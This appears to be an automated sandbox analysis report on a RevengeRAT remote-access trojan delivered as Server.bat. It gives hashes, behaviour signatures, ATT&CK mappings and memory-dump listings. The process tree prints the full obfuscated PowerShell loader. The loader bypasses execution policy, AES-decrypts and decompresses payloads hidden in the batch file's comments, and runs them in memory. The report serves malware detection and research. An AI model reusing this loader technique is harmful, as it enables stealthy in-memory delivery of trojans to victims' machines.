revengerat | c20c7d5127614b8d01d2938f1ca221468d19e5dd7bdd6b6a63dd835c86c65e1c

General

Target

Server.bat
Size

65KB
MD5

b1469c7f71a9bf071713922924295c90
SHA1

45dd879f91bdf7d87bf71b6a979b8245e893b1f4
SHA256

c20c7d5127614b8d01d2938f1ca221468d19e5dd7bdd6b6a63dd835c86c65e1c
SHA512

66729888bfd33698ca932dc2feccb70c889a7d63baf84006bdc5cec9432665f849a46bc67858f789a6a85487a9cee84f251e2d0793c401a0e1193dffadee84c5
SSDEEP

768:54iTasQx5KNc5CM35ZwGLwTgL6ZbzfcejzgK4OnTIe5GOswhdZirvUinOE:lTpQL7/w/TgLIbzfcejHltiLn3

Score

10^/10

revengerat execution stealer trojan

Malware Config

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/1376-16-0x000001F72AEE0000-0x000001F72AEF4000-memory.dmp	revengerat

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1376	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1376	powershell.exe
1376	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1376	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 1376	2708	cmd.exe	93
PID 2708 wrote to memory of 1376	2708	cmd.exe	93

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YSbY4Tvz1QAkcTZqNMxH02Ec95wDSyjjPazNwE/mZxg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dZSvfkNNhQpfO0JhWZqjdA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NdtDy=New-Object System.IO.MemoryStream(,$param_var); $yFsRk=New-Object System.IO.MemoryStream; $xvDZI=New-Object System.IO.Compression.GZipStream($NdtDy, [IO.Compression.CompressionMode]::Decompress); $xvDZI.CopyTo($yFsRk); $xvDZI.Dispose(); $NdtDy.Dispose(); $yFsRk.Dispose(); $yFsRk.ToArray();}function execute_function($param_var,$param2_var){ $dEKeS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $laCCD=$dEKeS.EntryPoint; $laCCD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$QUlWd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ymOIo in $QUlWd) { if ($ymOIo.StartsWith(':: ')) { $TfMhH=$ymOIo.Substring(3); break; }}$payloads_var=[string[]]$TfMhH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Drops file in System32 directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
1⤵
PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcvi5plh.lfy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1376-0-0x00007FFBEE9A3000-0x00007FFBEE9A5000-memory.dmp

Filesize
8KB

Download
memory/1376-1-0x000001F72AC70000-0x000001F72AC92000-memory.dmp

Filesize
136KB

Download
memory/1376-11-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1376-12-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1376-13-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1376-14-0x000001F728190000-0x000001F728198000-memory.dmp

Filesize
32KB

Download
memory/1376-15-0x000001F72AC60000-0x000001F72AC6E000-memory.dmp

Filesize
56KB

Download
memory/1376-16-0x000001F72AEE0000-0x000001F72AEF4000-memory.dmp

Filesize
80KB

Download
memory/1376-19-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing